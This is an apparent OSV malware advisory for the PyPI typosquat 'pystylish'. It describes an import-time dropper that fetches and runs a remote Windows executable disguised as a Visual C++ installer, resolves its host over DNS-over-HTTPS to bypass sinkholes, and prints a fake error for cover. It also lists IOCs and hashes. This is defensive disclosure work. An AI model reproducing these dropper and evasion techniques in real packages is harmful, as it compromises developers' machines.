{"id":"MAL-2026-6076","summary":"Malicious code in pystylish (PyPI)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (3a6a09e52477106b9586e89c2b0207bdc51e6d22dad500b7cc12a424d684c35b)\nOn `import pystylish`, the package's __init__.py spawns a daemon thread that downloads a Windows executable from https://goy.mikoz.xyz/boh3.exe, writes it to %TEMP%/vcredist_x86.exe (disguised as the Microsoft Visual C++ runtime installer), and executes it via subprocess.Popen. The domain is unrelated to the package's stated purpose (a terminal color/fade library) and is not a publisher-controlled host. To evade local DNS controls, the loader resolves the C2 domain through DNS-over-HTTPS (Cloudflare 1.1.1.1/dns-query and dns.google/resolve), then connects to the resolved IP with a manual Host header so /etc/hosts entries and sinkholes are bypassed. Error paths print a fake `Failed to connect to discord.com:80` message regardless of the actual destination, providing cover for the unrelated outbound traffic. The package is a typosquat/clone of the legitimate `pystyle` library by billythegoat356 — README still points at `github.com/billythegoat356/pystyle` while the package is published under the name `pystylish`, and the library API is copied verbatim from pystyle with the dropper appended. Any developer who installs and imports pystylish (including transitively) will silently fetch and run an attacker-controlled binary on Windows.\n\n## Source: kam193 (f8318d882352a4515c0598fc728a7609874502d0e42f98a8f47214307d07aec8)\nClone of a legitimate package. During import, the code downloads and executes a malicious executable.\n\n\n---\n\nCategory: MALICIOUS - The campaign has clearly malicious intent, like infostealers.\n\n\nCampaign: 2026-06-pystylish\n\n\nReasons (based on the campaign):\n\n\n - Downloads and executes a remote executable.\n\n\n - malware\n\n\n - clones-real-package\n","modified":"2026-06-17T20:01:51.897033501Z","published":"2026-06-17T19:05:58Z","database_specific":{"iocs":{"domains":["goy.mikoz.xyz","mikoz.xyz"],"urls":["https://goy.mikoz.xyz/boh3.exe"]},"malicious-packages-origins":[{"id":"IN-MAL-2026-006934","sha256":"3a6a09e52477106b9586e89c2b0207bdc51e6d22dad500b7cc12a424d684c35b","versions":["2.9"],"source":"amazon-inspector","modified_time":"2026-06-17T19:45:13Z","import_time":"2026-06-17T19:45:56.979348464Z"},{"id":"pypi/2026-06-pystylish/pystylish","sha256":"f8318d882352a4515c0598fc728a7609874502d0e42f98a8f47214307d07aec8","versions":["2.9"],"source":"kam193","modified_time":"2026-06-17T19:05:58.40841Z","import_time":"2026-06-17T19:45:58.747736209Z"}]},"references":[{"type":"PACKAGE","url":"https://pypi.org/project/pystylish/2.9/"},{"type":"EVIDENCE","url":"https://www.virustotal.com/gui/file/26486dbb6ee9811ddb3a288554eb80cbe2883069db0fd9f578736c971bcf8db2/detection"},{"type":"EVIDENCE","url":"https://hybrid-analysis.com/sample/26486dbb6ee9811ddb3a288554eb80cbe2883069db0fd9f578736c971bcf8db2"},{"type":"WEB","url":"https://bad-packages.kam193.eu/pypi/package/pystylish"}],"affected":[{"package":{"name":"pystylish","ecosystem":"PyPI","purl":"pkg:pypi/pystylish"},"versions":["2.9"],"database_specific":{"cwes":[{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"}],"indicators":{"package_integrity":[{"hashes":{"sha256":"0e9d3793b1258bde25398c194b158c0e9315b090c4bb584f4f7a9ee600212a9e","md5":"4a2d608fb193350beb95dd53c05d6908","blake2b_256":"77f71068de21b76dc12dbba2ea987e2bac443cedd16e21f6066a8ef71515e5dd"},"filename":"pystylish-2.9-py3-none-any.whl"},{"hashes":{"sha256":"2d570677c1fb22574b410f00106fe8d4ec5ad2c2342c79228e1e8e451f60c782","md5":"9434a4d2b2c5f98e21c42cc58c5cbaf7","blake2b_256":"ad035c72d787bcb4f2051fc2093206b63b070428cd612510596a246bca97e0e9"},"filename":"pystylish-2.9.tar.gz"}],"evidence_files":[{"sha256":"893e61f125ef8309dee86d5ccf5af89d3d0d9460bd0f575929de7a33cf8b8eb9","path":"pystylish/__init__.py","tlsh":"7ef27225ed171a135ab3c41e8c87d425f32923671a654617fe9cc1a82fb2128d3f4afd"},{"sha256":"245135d5e573e7d6ed240fcd1e5d5fad8b2e1608f581613bc4acfd23c2acf624","path":"README.md","tlsh":"b29002e3090390442f831dc948a861146a722484fe675445713b42115004865434a01e"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/pystylish/MAL-2026-6076.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"},{"name":"Kamil Mańkowski (kam193)","contact":["https://github.com/kam193","https://bad-packages.kam193.eu/"],"type":"REPORTER"}]}